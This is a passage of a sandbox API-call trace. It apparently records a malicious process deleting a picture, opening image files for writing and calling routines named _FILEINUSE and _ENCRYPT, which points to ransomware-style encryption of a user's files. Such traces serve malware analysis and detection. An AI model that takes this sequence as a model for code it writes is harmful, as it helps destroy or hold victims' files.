PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0191.564] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0191.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0191.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0191.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.565] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif", lpFilePart=0x0) returned 0x32 [0191.565] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17de1ac0, ftCreationTime.dwHighDateTime=0x1d5da23, ftLastAccessTime.dwLowDateTime=0x8f3abf20, ftLastAccessTime.dwHighDateTime=0x1d5e431, ftLastWriteTime.dwLowDateTime=0x1761a4e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1270a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="OV_bHLK.gif", cAlternateFileName="")) returned 0x90ae18 [0191.565] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ov_bhlk.gif")) returned 1 [0191.567] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17de1ac0, ftCreationTime.dwHighDateTime=0x1d5da23, ftLastAccessTime.dwLowDateTime=0x8f3abf20, ftLastAccessTime.dwHighDateTime=0x1d5e431, ftLastWriteTime.dwLowDateTime=0x1761a4e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1270a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="OV_bHLK.gif", cAlternateFileName="")) returned 0 [0191.567] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0191.569] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.569] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0191.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0191.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0191.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0191.570] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.570] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0191.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0191.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0191.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.570] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.570] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.570] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.570] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.571] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.571] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.571] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0191.571] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.571] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.571] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0191.571] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3230, lpOverlapped=0x0) returned 1 [0191.571] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0191.571] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3230, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.571] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0191.572] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0191.572] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0191.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.573] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0191.573] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.573] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.574] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0191.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.574] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.574] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0191.574] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.574] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdzhtnrtuaafiidk.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.574] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0191.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0191.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0191.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0191.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.576] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.576] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.576] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0191.576] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.577] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.577] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0191.578] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.578] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0191.578] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.578] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.578] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0191.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 